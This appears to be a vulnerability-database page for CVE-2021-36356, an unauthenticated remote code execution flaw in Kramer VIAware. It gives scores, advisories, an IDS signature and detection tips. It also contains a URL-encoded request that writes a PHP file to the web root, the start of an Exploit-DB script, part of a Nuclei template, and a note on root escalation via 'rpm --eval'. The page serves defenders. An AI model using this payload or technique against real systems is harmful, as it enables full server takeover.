CVE-2021-36356
published 2021-08-31CVE-2021-36356: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable…
PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
54.39%
98.9th percentile
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kramerav | viaware | <= 2021-08 | — |
Detection & IOCsextracted from sources · hover to see the quote
otherradioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:38; content:"/ajaxPages/writeBrowseFilePathAjax.php"; fast_pattern; http.request_body; content:"radioBtnVal="; content:"associateFileName="; reference:cve,2021-36356; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html; reference:url,write-up.github.io/kramerav/; reference:cve,2021-35064; classtype:attempted-admin; sid:2036738; rev:2; metadata:attack_target Server, created_at 2022_06_01, cve CVE_2021_35064_CVE_2021_36356, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2024_03_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Detect POST requests to /ajaxPages/writeBrowseFilePathAjax.php with both 'radioBtnVal=' and 'associateFileName=' in the request body — this is the core exploit primitive for arbitrary file write.
- →The exploit writes a PHP webshell to /var/www/html/ (e.g., test.php) via the associateFileName parameter; monitor for new .php files appearing in the Apache web root on VIAware appliances.
- →Post-exploitation command execution is achieved via 'sudo rpm --eval' with embedded Lua os.execute calls; monitor for rpm processes spawned by the web server user with --eval arguments. ↗
- →The Nuclei template uses the MD5 hash '44f63b292601ec4ab0d8c3244c9f5ebe' (md5 of 'CVE-2021-35064') as a canary in the webshell response body to confirm successful exploitation; alert on this string in HTTP responses from VIAware hosts.
- →The exploit URI for the exact vulnerable endpoint has a fixed byte size of 38 characters (/ajaxPages/writeBrowseFilePathAjax.php); use bsize matching in network signatures to reduce false positives.
- ·CVE-2021-36356 is an incomplete fix for CVE-2019-17124; the GUI entry point (browseSystemFiles.php) was removed but the underlying writable endpoint (writeBrowseFilePathAjax.php) remained accessible and unauthenticated. ↗
- ·The exploit is unauthenticated and requires no prior access; the POST to writeBrowseFilePathAjax.php is directly reachable over HTTPS without credentials.
- ·The Snort/ET rule targets both CVE-2021-35064 and CVE-2021-36356 in a single signature (sid:2036738); defenders should be aware that a single alert may correspond to either CVE being exploited.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qjp8-q2c4-mpmm: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2021-36356 [CRITICAL] CWE-434 GHSA-qjp8-q2c4-mpmm: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124.
VulnCheck
kramerav viaware Unrestricted Upload of File with Dangerous Type
vulncheck·2021·CVSS 9.8
CVE-2021-36356 [CRITICAL] kramerav viaware Unrestricted Upload of File with Dangerous Type
kramerav viaware Unrestricted Upload of File with Dangerous Type
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124.
Affected: kramerav viaware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/ma
Suricata
ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)
suricata·2022-06-01·CVSS 9.8
CVE-2021-36356 [CRITICAL] ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)
ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:38; content:"/ajaxPages/writeBrowseFilePathAjax.php"; fast_pattern; http.request_body; content:"radioBtnVal="; content:"associateFileName="; reference:cve,2021-36356; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html; reference:url,write-up.github.io/kramerav/; reference:cve,2021-35064; classtype:attempted-admin;
Exploit-DB
Kramer VIAware - Remote Code Execution (RCE) (Root)
exploitdb·2022-04-07·CVSS 9.8
CVE-2021-36356 [CRITICAL] Kramer VIAware - Remote Code Execution (RCE) (Root)
Kramer VIAware - Remote Code Execution (RCE) (Root)
---
# Exploit Title: Remote Code Execution as Root on KRAMER VIAware
# Date: 31/03/2022
# Exploit Author: sharkmoos
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: *
# Tested on: ViaWare Go (Linux)
# CVE : CVE-2021-35064, CVE-2021-36356
import sys, urllib3
from requests import get, post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def writeFile(host):
headers = {
"Host": f"{host}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html, */*",
"Accept-Language": "en-GB,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With
Nuclei
Kramer VIAware - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-36356 [CRITICAL] Kramer VIAware - Remote Code Execution
Kramer VIAware - Remote Code Execution
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
Template:
id: CVE-2021-36356
info:
name: Kramer VIAware - Remote Code Execution
author: gy741
severity: critical
description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
impact: |
Unauthenticated attackers can upload arbitrary PHP files to the web root, achieving remote code execution and complete server compromise.
remediation: |
Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web int
No writeups or analysis indexed.
2021-08-31
Published
Exploited in the wild